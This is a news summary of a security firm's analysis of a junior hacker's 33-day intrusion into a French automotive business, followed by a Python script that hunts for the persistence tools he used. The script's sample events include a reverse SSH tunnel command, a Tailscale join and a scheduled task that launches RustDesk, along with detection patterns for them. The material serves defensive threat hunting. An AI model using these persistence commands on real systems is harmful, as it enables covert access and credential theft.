- Attackers can maintain access after C2 takedowns by installing separate persistence tools like OpenSSH and VPN software.
- A junior hacker used free-tier services and a visible playbook but still successfully stole credentials from multiple machines.
- The key threat involves legitimate, signed tools like Tailscale and RustDesk evading traditional file-based detection.
- Effective remediation requires hunting for the secondary, quiet persistence layer behind any discovered command-and-control server.
A junior French-speaking hacker, operating after school hours, successfully breached a small French automotive business over 33 days, according to a detailed analysis by Cato Networks. The operator, using the handle “Poisson,” planted a keylogger and stole banking and email credentials using free infrastructure.
However, a critical move ensured his access outlived his primary attack server. He installed OpenSSH and Tailscale on a victim’s machine, creating an independent backdoor.
Consequently, when his Havoc command-and-control server went offline the next day, his access persisted for 18 days via the Tailscale network. The agents automatically reconnected when the C2 returned, allowing the operation to continue.
Researchers captured 339 commands after the operator leaked his SSH keys and a playbook. His tradecraft was described as thin, frequently failing and leaking his own data.
Meanwhile, the malware chain relied heavily on in-memory execution. A VBScript stager led to a PowerShell loader, which deployed Havoc's Demon agent without touching disk.
For persistence, he set a scheduled task and used a custom RustDesk instance. The keylogger was a simple Python script, with keystrokes harvested manually after using powercfg to keep systems awake.
Ultimately, the incident underscores that pulling a C2 offline is insufficient remediation. Cato Networks recommends specific hunts for OpenSSH installs, tailscale.exe, and reverse SSH tunnels on unauthorized workstations.
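As an added illustration of the hunts recommended above (example code written for this summary, not Cato Networks' own detection logic), the script below triages constructed Sysmon-style process-creation events for tailscale.exe on unapproved hosts, an OpenSSH server on unapproved hosts, reverse SSH tunnels (`ssh -R`), RustDesk references and scheduled-task creation; the hostnames, paths, allowlists and placeholder auth key are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (Sysmon-style fields); hostnames,
# paths, the IP and the auth key are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    {"host": "WS-ACCT-02", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\a\Downloads\invoice.vbs"},
    {"host": "WS-ACCT-02", "image": r"C:\Program Files\Tailscale\tailscale.exe",
     "cmdline": "tailscale.exe up --authkey tskey-PLACEHOLDER"},
    {"host": "WS-ACCT-02", "image": r"C:\Windows\System32\OpenSSH\sshd.exe",
     "cmdline": "sshd.exe"},
    {"host": "WS-ACCT-03", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -N -R 2222:localhost:22 user@198.51.100.10"},
    {"host": "WS-ACCT-03", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /tn Updater /tr C:\Users\a\rustdesk.exe /sc onlogon"},
    {"host": "JUMP-01", "image": r"C:\Program Files\Tailscale\tailscale.exe",
     "cmdline": "tailscale.exe status"},
]

# Hosts where these tools are sanctioned (assumed); any other host is an
# "unauthorized workstation" in the sense of the recommended hunt.
APPROVED_TAILSCALE_HOSTS = {"JUMP-01"}
APPROVED_SSHD_HOSTS = {"BUILD-01"}

# ssh/ssh.exe invoked with a remote port forward (-R <port>:...) is a reverse tunnel.
REVERSE_TUNNEL = re.compile(r"\bssh(?:\.exe)?\b.*\s-R\s*\d*:", re.IGNORECASE)
SCHTASK_CREATE = re.compile(r"schtasks(?:\.exe)?\s+/create", re.IGNORECASE)

def classify(event: dict) -> list[str]:
    """Return the hunt findings for one event (empty list if nothing matched)."""
    host = event["host"]
    exe = PureWindowsPath(event["image"]).name.lower()
    cmd = event["cmdline"]
    findings = []
    if exe in {"tailscale.exe", "tailscaled.exe"} and host not in APPROVED_TAILSCALE_HOSTS:
        findings.append("tailscale on unauthorized workstation")
    if exe == "sshd.exe" and host not in APPROVED_SSHD_HOSTS:
        findings.append("OpenSSH server running on unauthorized workstation")
    if REVERSE_TUNNEL.search(cmd):
        findings.append("reverse SSH tunnel")
    if "rustdesk" in cmd.lower():
        findings.append("RustDesk remote access tool referenced")
    if SCHTASK_CREATE.search(cmd):
        findings.append("scheduled task created")
    return findings

def hunt(events: list[dict]) -> list[tuple[str, str]]:
    """Flatten findings into (host, finding) pairs for triage."""
    return [(e["host"], f) for e in events for f in classify(e)]

if __name__ == "__main__":
    for host, finding in hunt(SAMPLE_EVENTS):
        print(f"{host}: {finding}")
```

In a real environment the event list would be fed from the EDR or Sysmon export, and the two allowlists from the asset inventory.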
